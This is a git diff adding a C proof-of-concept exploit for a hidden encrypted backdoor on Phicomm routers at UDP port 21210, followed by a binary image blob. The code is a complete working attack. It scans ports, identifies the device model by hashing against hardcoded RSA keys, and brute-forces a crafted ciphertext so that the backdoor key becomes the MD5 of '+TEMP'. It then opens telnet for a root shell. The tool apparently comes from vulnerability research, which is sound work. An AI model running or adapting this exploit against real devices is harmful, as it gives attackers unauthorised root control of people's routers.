+	0x2b	0x16	0xa8	0x17	0x21	0xe6	0xc6	0x30
+	0x7e	0x60	0x9a	0xdd	0x04	0xda	0xe5	0xe2
+	0x63	0xff	0x2f	0x12	0x0c	0xa2	0x6f	0x6e
+	0x6a	0x27	0x9c	0xa9	0x4a	0x3e	0x01	0x5f
+	0x19	0x60	0xfc	0x1e	0x7d	0xc4	0x94	0xf7
+*/
+
+
+int test() {
+  unsigned char ciphertext[CIPHERTEXT_LENGTH];
+  char test_case[PLAINTEXT_LENGTH] = "S<:2\\fPve:j%lJ$j%A[DGQ-v|p,-;Tr";
+  int res;
+  RSA *rsa;
+
+  rsa = init_rsa("E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD7"
+                 "24AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B38"
+                 "8451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7"
+                 "AF52829E9F858691",
+                 "010001");
+
+  unsigned char expected[CIPHERTEXT_LENGTH] = {
+	0xdd,	0x02,	0x0a,	0x44,	0x45,	0x84,	0xbd,	0xf4,
+	0x86,	0x8f,	0x32,	0xa3,	0xad,	0xbf,	0x25,	0x06,
+	0x5b,	0x5a,	0x75,	0x9c,	0x06,	0xb1,	0xad,	0xf5,
+	0xb1,	0x41,	0x0e,	0xaa,	0xcc,	0x61,	0xcc,	0x01,
+	0xfd,	0x59,	0xb8,	0xbd,	0x7b,	0x19,	0x17,	0x78,
+	0xa2,	0x77,	0xac,	0xae,	0x40,	0x43,	0x5a,	0xa8,
+	0x25,	0x78,	0xda,	0x6c,	0xae,	0x93,	0x56,	0xb7,
+	0xc2,	0x47,	0x14,	0x1b,	0xb0,	0xef,	0x70,	0xc3,
+	0x95,	0x27,	0x3d,	0x3c,	0xde,	0x3c,	0x34,	0x21,
+	0xf4,	0xc7,	0xef,	0xf0,	0xa0,	0x7a,	0xff,	0xf4,
+	0x66,	0x5f,	0xdf,	0x19,	0x57,	0x5e,	0xe5,	0x92,
+	0x2b,	0x16,	0xa8,	0x17,	0x21,	0xe6,	0xc6,	0x30,
+	0x7e,	0x60,	0x9a,	0xdd,	0x04,	0xda,	0xe5,	0xe2,
+	0x63,	0xff,	0x2f,	0x12,	0x0c,	0xa2,	0x6f,	0x6e,
+	0x6a,	0x27,	0x9c,	0xa9,	0x4a,	0x3e,	0x01,	0x5f,
+	0x19,	0x60,	0xfc,	0x1e,	0x7d,	0xc4,	0x94,	0xf7
+  };
+
+  printf("[=] Test case: '%s'\n", test_case);
+  encrypt_with_pubkey(rsa, (unsigned char *) test_case, ciphertext);
+
+  res = memcmp(ciphertext, expected, CIPHERTEXT_LENGTH);
+  if (res != 0) {
+    printf("[X] FAILED TEST CASE!\n");
+    exit(1);
+  }
+  hexdump(ciphertext, CIPHERTEXT_LENGTH);
+
+  printf("\n[*] TEST SUCCESSFUL!\n");
+
+  return res;
+}
+
+
+
+//// Network code
+
+
+int communicate(char *ip_addr, 
+    unsigned int port,
+    unsigned char *msg, 
+    unsigned int msg_len, 
+    unsigned char *resp,
+    unsigned int resp_len,
+    long int recv_timeout) {
+
+
+  int sockfd;
+  size_t n;
+  unsigned int len;
+  struct timeval tv;
+  tv.tv_sec =  recv_timeout / 1000000;
+  tv.tv_usec = recv_timeout % 1000000;
+
+  n = 0;
+
+  struct sockaddr_in server_addr;
+  memset(&server_addr,0,sizeof(struct sockaddr_in));
+  struct sockaddr_in server_resp_addr;
+  memset(&server_resp_addr, 0, sizeof(struct sockaddr_in));
+
+  sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+  if(sockfd == -1){
+    puts("[x] Failed to create socket. Fatal.");
+    exit(1);
+  }
+  
+
+
+  // Set address information
+  server_addr.sin_family = AF_INET;
+  server_addr.sin_addr.s_addr = inet_addr(ip_addr);
+  server_addr.sin_port = htons(port);
+  
+  printf("[>] Sending message to %s on UDP port %d:\n", ip_addr, port);
+  hexdump(msg, msg_len);
+
+  sendto(sockfd, (const char*) msg, msg_len, NO_FLAGS, 
+      (const struct sockaddr *) &server_addr,
+      sizeof(server_addr));
+
+  printf("[>] Message sent.\n");
+
+
+  if (resp_len > 0) {
+    printf("[-] Expecting %d bytes in reply...\n", resp_len);
+    printf("[-] Setting socket timeout to %lds + %ldus\n", tv.tv_sec, tv.tv_usec);
+    //setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
+    
+    // Here we might want to read from the socket in chunks, without
+    // blocking indefinitely...
+    //
+    n = recvfrom(sockfd, resp, resp_len, NO_FLAGS,
+        (struct sockaddr *) &server_resp_addr, &len);
+
+    print_from(&server_resp_addr);
+
+    printf("\n[<] Received %ld bytes in reply:\n", n);
+    hexdump(resp, n);
+  }
+
+  close(sockfd);
+
+  return n;
+}
+
+
+
+int check_tcp_port(char *ip_addr, int port) {
+  int sockfd;
+
+  printf("[>] Checking TCP port %d on %s...\n", port, ip_addr);
+  sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+  if(sockfd == -1){
+    puts("[x] Failed to create socket. Fatal.");
+    exit(1);
+  }
+  struct sockaddr_in server_addr;
+  memset(&server_addr,0,sizeof(struct sockaddr_in));
+
+  // Set address information
+  server_addr.sin_family = AF_INET;
+  server_addr.sin_addr.s_addr = inet_addr(ip_addr);
+  server_addr.sin_port = htons(port);
+  if (connect(sockfd,(struct sockaddr *) &server_addr,sizeof(server_addr)) < 0) {
+    printf("[x] TCP port %d on %s is closed.\n", port, ip_addr);
+    close(sockfd);
+    return 0;
+  } else {
+    printf("[!] TCP port %d on %s is open.\n", port, ip_addr);
+    close(sockfd);
+    return 1;
+  }
+}
+
+
+struct DeviceList {
+  unsigned char *hash;
+  const char *identifier;
+  const char *public_n;
+  const char *public_e;
+  struct DeviceList *next;
+};
+
+
+struct DeviceList * add_entry_to_device_list(struct DeviceList *DL, 
+    const char *identifier,
+    const char *public_n,
+    const char *public_e) {
+  struct DeviceList * node;
+  node = DL;
+
+  unsigned char buffer[0x80];
+  memset(buffer, 0, 0x80);
+  
+  if (node->identifier != NULL) {
+    // first, find the end of the list:
+    for (node = DL; node->next != NULL; node = node->next) {
+      if (!strcmp(node->identifier, identifier)) {
+        printf("[-] %s already appears in device list.\n", identifier);
+        return node;
+      }
+    }
+
+    // The empty cell is now at node->next
+    node->next = malloc(sizeof(struct DeviceList));
+    memset(node->next, 0, sizeof(struct DeviceList));
+    node = node->next;
+  }
+
+  node->identifier = strdup(identifier);
+  node->hash = device_identifying_hash(identifier);
+  node->public_n = strdup(public_n);
+  node->public_e = public_e;
+
+  printf("[+] Added device to list:\n"
+      "    - identifier: %s\n"
+      "    - public_n: 0x%s\n"
+      "    - public_e 0x%s\n"
+      "    - hash:\n",
+      identifier,
+      public_n,
+      public_e);
+  hexdump(node->hash, 16);
+
+  return node;
+}
+
+
+struct DeviceList * lookup_device_hash(struct DeviceList *DL, unsigned char *hash) {
+  struct DeviceList *node; 
+  node = DL;  
+  for (node = DL; node != NULL; node = node->next) {
+    if (!memcmp(hash, node->hash, 16)) {
+      printf("[+] Found matching hash. Identifier: %s\n", node->identifier);
+      return node;
+    }
+  }
+  return NULL;
+}
+
+
+struct DeviceList * init_device_list() {
+  struct DeviceList *DL;
+  DL = (struct DeviceList *) malloc(sizeof(struct DeviceList));
+  memset(DL, 0, sizeof(struct DeviceList));
+
+  add_entry_to_device_list(DL,
+    "K2_COSTDOWN__VER_3.0",
+    "E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD7"
+    "24AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B38"
+    "8451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7"
+    "AF52829E9F858691",
+    "010001");
+
+  add_entry_to_device_list(DL,
+    "K3C_INTELALL_VER_3.0",
+    "E7FFD1A1BB9834966763D1175CFBF1BA2DF53A004B62977E5B985DFFD6D43785E5BCA088A6417BAF"
+    "070BCE199B043C24B03BCEB970D7E47EEBA7F59D2BE4764DD8F06DB8E0E2945C912F52CB31C56C83"
+    "49B689198C4A0D88FD029CCECDDFF9C1491FFB7893C11FAD69987DBA15FF11C7F1D570963FA3825B"
+    "6AE92815388B3E03",
+    "010001");
+
+
+  return DL;
+}
+
+
+
+struct DeviceList * probe_udp_port(struct DeviceList *DL, 
+    char *ip_addr, 
+    int port, 
+    unsigned char *token, 
+    int token_len) {
+  int n;
+  unsigned int len;
+  unsigned char buffer[0x80];
+  struct DeviceList *device_info;
+
+  memset(buffer, 0, 0x80);
+  
+  int sockfd, res;
+  struct sockaddr_in server_addr;
+  memset(&server_addr,0,sizeof(struct sockaddr_in));
+
+  sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+
+  // Set address information
+  server_addr.sin_family = AF_INET;
+  server_addr.sin_addr.s_addr = inet_addr(ip_addr);
+  server_addr.sin_port = htons(port);
+  
+  printf("[-] Probing UDP port %d on %s...\n", port, ip_addr);
+  //hexdump(token, token_len);
+
+  res = sendto(sockfd, (const char*) token, token_len, NO_FLAGS, 
+      (const struct sockaddr *) &server_addr,
+      sizeof(server_addr));
+
+  usleep(SCAN_DELAY);
+
+  if (res < 0) {
+    printf("[x] sendto() failed.\n");
+    return NULL;
+  }
+
+  n = recvfrom(sockfd, buffer, 1, MSG_PEEK|MSG_DONTWAIT,
+      (struct sockaddr *) &server_addr,
+      &len);
+
+  if (n < 1) {
+    printf("[-] no response on port %d\n", port);
+    return NULL;
+  }
+
+  printf("[+] response incoming...\n");
+
+  memset(buffer, 0, 0x80);
+
+  n = recvfrom(sockfd, buffer, 16, MSG_WAITALL,
+      (struct sockaddr *) &server_addr,
+      &len);
+  printf("[+] Received %d bytes in reply to token on UDP port %d:\n", n, port);
+  hexdump(buffer, n);
+  if (n == 16) {
+    device_info = lookup_device_hash(DL, buffer);
+    return device_info;
+  }
+
+  close(sockfd);
+
+  return NULL; 
+}
+
+//// Exploit
+
+#define PHONY_CIPHERTEXT_LENGTH 0x80
+
+void random_buffer(unsigned char *buf, int len) {
+  FILE *urandom;
+  urandom = fopen("/dev/urandom", "rb");
+  fread(buf, sizeof(unsigned char), len, urandom);
+  fclose(urandom);
+  return;
+}
+
+unsigned char *find_phony_ciphertext(RSA *rsa) {
+  unsigned char *phony_ciphertext;
+  unsigned char phony_plaintext[1024];
+  int plaintext_length;
+  memset(phony_plaintext, 0, 0x20);
+  phony_ciphertext = calloc(PHONY_CIPHERTEXT_LENGTH, sizeof(char));
+  do {
+
+    random_buffer(phony_ciphertext, PHONY_CIPHERTEXT_LENGTH);
+    phony_ciphertext[0] || (phony_ciphertext[0] |= 1);
+
+    if (rsa == NULL) {
+      // If we don't have the public key, we can still try just
+      // throwing random buffers at the target and see what
+      // sticks.
+      printf("[-] We don't have a matching public key for this target\n"
+          "    so we'll just throw random buffers at it and see what sticks.\n"
+          "    returning:\n");
+      hexdump(phony_ciphertext, PHONY_CIPHERTEXT_LENGTH);
+      return phony_ciphertext;
+    }
+    plaintext_length = decrypt_with_pubkey(rsa, phony_ciphertext, phony_plaintext); 
+    // If the first character of phony_plaintext is printable, then
+    // there is a chance it will collide with the first character of
+    // the secret, random string. Since the phony_plaintext will be
+    // XORed with the random string, this will produce a null byte at
+    // offset 0. And THIS will cause the string concatenation
+    // operation that's used to produce the telnet activation keys
+    // to append an EMPTY STRING to the salt/suffix. And this will
+    // make the MD5 hash of the secret predictable.
+    if ((plaintext_length < 0x101) && 
+        (0x21 <= phony_plaintext[0]) && 
+        (phony_plaintext[0] < 0x7f)) {
+      printf("[!] Found stage 2 payload:\n");
+      hexdump(phony_ciphertext, PHONY_CIPHERTEXT_LENGTH);
+      printf("[=] Decrypts to (%d bytes):\n", plaintext_length);
+      hexdump(phony_plaintext, plaintext_length);
+      return phony_ciphertext;
+    }
+  } while (1);
+}
+
+
+
+int main(int argc, char **argv) {
+  unsigned char ciphertext[CIPHERTEXT_LENGTH];
+  unsigned char plaintext[PLAINTEXT_LENGTH+1];
+  RSA *rsa;
+  rsa = NULL;
+  WIPE();
+
+  if (argc == 1) {
+    printf("[?] Usage: %s [<test|enc $length|dec $length>| <ip addr>]\n", argv[0]);
+    exit(1);
+  }
+  
+
+  if (!(strcmp(argv[1], "test"))) {
+    test();
+    exit(0);
+  }
+
+  if (!(strcmp(argv[1], "enc"))) {
+    rsa = init_rsa(K2G_HARDCODED_n, K2G_HARDCODED_e);
+    fread(plaintext, sizeof(char), PLAINTEXT_LENGTH, stdin);
+    fflush(stdin);
+    fprintf(stderr, "[+] Read data:\n");
+    fhexdump(stderr, plaintext, PLAINTEXT_LENGTH);
+    fprintf(stderr, "[+] Encrypting plaintext '%s' of length %ld\n", plaintext, 
+        strlen((char *) plaintext));
+    encrypt_with_pubkey(rsa, plaintext, ciphertext);
+    hexdump(ciphertext, CIPHERTEXT_LENGTH);
+    exit(0);
+  } else if (!(strcmp(argv[1], "dec"))) {
+    rsa = init_rsa(K2G_HARDCODED_n, K2G_HARDCODED_e);
+    fread(ciphertext, sizeof(char), CIPHERTEXT_LENGTH, stdin);
+    fprintf(stderr, "[+] Read data:\n");
+    fhexdump(stderr, ciphertext, CIPHERTEXT_LENGTH);
+    fprintf(stderr, "[+] Decrypting with public key...\n");
+    decrypt_with_pubkey(rsa, ciphertext, plaintext);
+    hexdump(plaintext, PLAINTEXT_LENGTH);
+    fprintf(stderr, "[+] strlen(decrypt_with_pubkey(payload)) = %ld\n", strlen((char *) plaintext)); 
+    exit(0);
+  }
+     
+
+  /** The exploit **/
+
+  char *ip_addr = argv[1]; 
+  const char *handshake_token = "ABCDEF1234";
+  unsigned char *phony_ciphertext;
+  unsigned char backdoor_key[16];
+  const char *magic_salt = "+TEMP";
+  unsigned char buffer[CIPHERTEXT_LENGTH];
+  int tries = MAX_TRIES;
+  char *telnet_command;
+  struct timeval timecheck;
+  long int start;
+  long int elapsed;
+  int number_of_ports_to_scan;
+  int i;
+  int *ports_to_scan;
+  int backdoor_port;
+  int CHAOS_MODE = 0;
+
+  int stage_delay = STAGE_DELAY;
+  struct DeviceList *device_list;
+  struct DeviceList *device_info;
+  device_list = init_device_list();
+
+  if ((argc < 3) || strcmp(argv[2], "scan")) {
+    number_of_ports_to_scan = 1;
+    ports_to_scan = NULL;
+    if (argc < 3) {
+      backdoor_port = 21210;
+    } else {
+      backdoor_port = atoi(argv[2]);
+    }
+  } else {
+    number_of_ports_to_scan = argc - 3;
+    ports_to_scan = calloc(number_of_ports_to_scan, sizeof(int));
+    int p = 0;
+    for (i = 3; i < argc; i++) {
+      // check to see if a range is given
+      char *upper, *lower;
+      int upper_port, lower_port;
+      lower = strtok(argv[i], "-");
+      upper = strtok(NULL, "-");
+      lower_port = atoi(lower);
+      if (upper != NULL) {
+        printf("[+] Found range delimiter in %s\n", argv[i]);
+        int *ports_to_scan_new;
+        upper_port = atoi(upper);
+        printf("[+] lower = %d, upper = %d\n", lower_port, upper_port);
+        number_of_ports_to_scan += (upper_port - lower_port);
+        ports_to_scan_new = calloc(number_of_ports_to_scan, sizeof(int));
+        memcpy(ports_to_scan_new, ports_to_scan, p * sizeof(int));
+        free(ports_to_scan);
+        ports_to_scan = ports_to_scan_new;
+        int P;
+        for (P = lower_port; P <= upper_port; P++) {
+          printf("[+] Adding port %d to scan list\n", P);
+          ports_to_scan[p] = P;
+          p++;
+        }
+      } else {
+        printf("[+] Adding port %d to scan list\n", lower_port);
+        ports_to_scan[p] = lower_port;
+        p++;
+      }
+    }
+  }
+
+
+  telnet_command = malloc(0x80 * sizeof(char));
+  sprintf(telnet_command, "telnet %s 23", ip_addr);
+  
+  if (check_tcp_port(ip_addr, TELNET_PORT)) {
+    printf("[!] The back door is already open! Why not killall telnetd and try again?\n");
+    system(telnet_command);
+    printf("[*] Have a nice day.\n");
+    exit(0);
+  }
+
+  gettimeofday(&timecheck, NULL);
+  start = (long)timecheck.tv_sec * 1000 + (long)timecheck.tv_usec / 1000;
+
+  //////////////////////////
+  // Port scan
+  // ////////////////////////
+  if (ports_to_scan != NULL) {
+    printf("[+] About to scan %d ports...\n", number_of_ports_to_scan);
+    for (i = 0; i < number_of_ports_to_scan; i++) {
+      backdoor_port = ports_to_scan[i];
+      device_info = probe_udp_port(device_list, 
+          ip_addr, backdoor_port, 
+          (unsigned char *) handshake_token, 
+          strlen((char *) handshake_token)); 
+      if (device_info != NULL) {
+        break;
+      }
+    }
+  
+
+    if (device_info == NULL) {
+      printf("[x] Failed to solicit identifying handshake on the following ports:\n");
+      for (i = 0; i < number_of_ports_to_scan; i++) {
+        printf("    - %d\n", ports_to_scan[i]);
+      }
+      if (number_of_ports_to_scan > 1) {
+        exit(1);
+      } else {
+        printf("[+] But you only specified one port, so we'll perservere with a null key.\n");
+        rsa = NULL;
+        CHAOS_MODE = 1;
+        goto STAGE_II;
+      }
+    } else {
+      rsa = init_rsa((char *) device_info->public_n, device_info->public_e);
+      goto STAGE_II;
+    }
+  }
+
+
+
+#define QUALITY_CONTROL(__com_res) { if ((__com_res) == -1) { \
+  printf("[x] What we have here is a failure to communicate.\n"); \
+  stage_delay += 1000; \
+  /* goto STAGE_I; */ \
+} else if (stage_delay > 100) { \
+  stage_delay -= 100; \
+} }
+
+  /* something should be done here to reset the state machine */
+  int on_try = 0;
+  int com_res = 0;
+  do {
+    
+    goto STAGE_I;
+
+STAGE_I:
+    on_try += 1;
+    usleep(stage_delay);
+    memset(buffer, 0, 0x80);
+    bar('=');
+    printf("[*] ENTERING STAGE I (round %d/%d) (delay = %d)%s\n", on_try, tries,
+        stage_delay,
+        CHAOS_MODE ? " IN CHAOS MODE" : "");
+    bar('=');
+    printf("[+] Sending handshake token: %s\n", handshake_token);
+    printf("[-] Waiting for device identifying hash...\n");
+    QUALITY_CONTROL(communicate(ip_addr, backdoor_port,
+        (unsigned char *) handshake_token,
+        strlen((char *) handshake_token),
+        buffer,
+        16,
+        stage_delay));
+
+    printf("[+] Received device identifying hash:\n");
+    hexdump(buffer, 16);
+
+    if (!CHAOS_MODE) {
+      if (device_info == NULL) {
+        if ((device_info = lookup_device_hash(device_list, buffer))) {
+          rsa = init_rsa((char *) device_info->public_n, device_info->public_e);
+        } else {
+          CHAOS_MODE = 1;
+        }
+      } else {
+        // not strictly necessary, but I like to make sure everything's in order
+        if (0 != memcmp(device_info->hash, buffer, 16)) {
+          printf("[x] Discrepancy in device identifying hash. Expected:\n");
+          hexdump(device_info->hash, 16);
+          if (rsa != NULL) {
+            exit(1);
+          }
+        } else {
+          printf("[+] Device identifying hash matches expected value.\n");
+        }
+      }
+    } else {
+      printf("[!] Not checking hash (CHAOS MODE).\n");
+    }
+
+    goto STAGE_II;
+
+STAGE_II:
+    usleep(stage_delay);
+    memset(buffer, 0, 0x80);
+    bar('=');
+    printf("[*] ENTERING STAGE II (round %d/%d) (delay = %d)%s\n", on_try, tries,
+        stage_delay,
+        CHAOS_MODE ? " IN CHAOS MODE" : "");
+    bar('=');
+    memset(buffer, 0, CIPHERTEXT_LENGTH);
+    phony_ciphertext = find_phony_ciphertext(rsa);  
+    // This blocks and waits too long in CHAOS_MODE
+    com_res = communicate(ip_addr, backdoor_port,
+        phony_ciphertext,
+        PHONY_CIPHERTEXT_LENGTH,
+        buffer,
+        CIPHERTEXT_LENGTH,
+        stage_delay);
+    free(phony_ciphertext);
+    QUALITY_CONTROL(com_res);
+
+    goto STAGE_III;
+
+STAGE_III:
+    usleep(stage_delay);
+    memset(buffer, 0, 0x80);
+    bar('=');
+    printf("[*] ENTERING STAGE III (round %d/%d) (delay = %d)%s\n", on_try, tries, 
+        stage_delay,
+        CHAOS_MODE ? " IN CHAOS MODE" : "");
+    bar('=');
+    memset(backdoor_key, 0, 0x10);
+    printf("[+] Sending MD5('%s') and hoping for collision...\n",
+        (char *) magic_salt);
+    md5raw(backdoor_key, (unsigned char *) magic_salt, strlen(magic_salt));
+    com_res = communicate(ip_addr, backdoor_port,
+        backdoor_key,
+        0x10,
+        buffer,
+        0,
+        stage_delay);
+    QUALITY_CONTROL(com_res);
+
+    /* Now test to see if the telnet port is open. */
+
+    usleep(stage_delay);
+    if (check_tcp_port(ip_addr, TELNET_PORT)) {
+
+      gettimeofday(&timecheck, NULL);
+      elapsed = ((long)timecheck.tv_sec * 1000 + (long)timecheck.tv_usec / 1000) - start;
+
+      printf("[*] Backdoor lock picked in %ld msec with %d attempts.\n", elapsed, on_try);
+      printf("[*] Please enjoy your root shell.\n");
+      system(telnet_command);
+      printf("[*] PoC complete. Have a nice day.\n");
+      exit(0);
+    } else {
+      printf("[+] Not yet. %d tries remaining...\n", tries-on_try);
+    }
+
+  } while (tries - on_try > 0);
+  
+  return 0;
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png b/Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png
new file mode 100644
index 0000000000000000000000000000000000000000..5197a4d1417a59c1c7133a743ca1fd6e99184243
GIT binary patch
literal 278849
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
